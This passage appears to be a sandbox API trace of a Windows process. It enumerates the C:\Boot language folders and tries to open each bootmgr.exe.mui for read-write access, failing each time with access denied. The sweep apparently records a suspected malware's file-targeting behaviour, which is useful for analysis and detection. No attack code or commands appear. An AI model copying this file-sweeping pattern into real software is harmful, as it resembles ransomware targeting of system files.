ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.883] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.883] GetProcessHeap () returned 0x550000 [0129.883] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.883] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.883] GetLastError () returned 0x5 [0129.883] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.883] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.883] GetProcessHeap () returned 0x550000 [0129.883] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.883] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x240000, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0129.884] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0129.884] GetProcessHeap () returned 0x550000 [0129.884] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.884] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.884] GetProcessHeap () returned 0x550000 [0129.884] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.884] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.884] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.884] GetProcessHeap () returned 0x550000 [0129.884] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.884] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.886] GetLastError () returned 0x5 [0129.886] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.886] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.886] GetProcessHeap () returned 0x550000 [0129.886] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.886] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0129.886] GetProcessHeap () returned 0x550000 [0129.886] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.887] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.887] GetProcessHeap () returned 0x550000 [0129.887] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.887] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.887] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.887] GetProcessHeap () returned 0x550000 [0129.887] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.887] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.887] GetLastError () returned 0x5 [0129.887] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.887] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.888] GetProcessHeap () returned 0x550000 [0129.888] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.888] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0129.888] GetProcessHeap () returned 0x550000 [0129.888] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.888] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.888] GetProcessHeap () returned 0x550000 [0129.888] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.888] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.888] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.888] GetProcessHeap () returned 0x550000 [0129.888] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.888] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.915] GetLastError () returned 0x5 [0129.915] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.915] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.916] GetProcessHeap () returned 0x550000 [0129.916] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.916] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0129.916] GetProcessHeap () returned 0x550000 [0129.916] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.916] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.917] GetProcessHeap () returned 0x550000 [0129.917] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.917] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.917] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.917] GetProcessHeap () returned 0x550000 [0129.918] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.918] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.918] GetLastError () returned 0x5 [0129.918] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.918] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.918] GetProcessHeap () returned 0x550000 [0129.918] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.918] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0129.918] GetProcessHeap () returned 0x550000 [0129.918] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.918] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.918] GetProcessHeap () returned 0x550000 [0129.919] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.919] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.919] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.919] GetProcessHeap () returned 0x550000 [0129.919] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.919] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.923] GetLastError () returned 0x5 [0129.923] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.923] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.923] GetProcessHeap () returned 0x550000 [0129.923] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.923] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0129.923] GetProcessHeap () returned 0x550000 [0129.923] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.924] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*.*", lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x597fa0 [0129.924] GetProcessHeap () returned 0x550000 [0129.924] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0129.924] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.924] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.924] GetProcessHeap () returned 0x550000 [0129.924] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x22e) returned 0x594e90 [0129.924] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.924] GetLastError () returned 0x5 [0129.924] FindNextFileW (in: hFindFile=0x597fa0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0129.924] FindClose (in: hFindFile=0x597fa0 | out: hFindFile=0x597fa0) returned 1 [0129.925] GetProcessHeap () returned 0x550000 [0129.925] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x594e90 | out: hHeap=0x550000) returned 1 [0129.925] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0129.925] GetProcessHeap () returned 0x550000 [0129.925] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2c) returned 0x56cb70 [0129.925] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*.*", 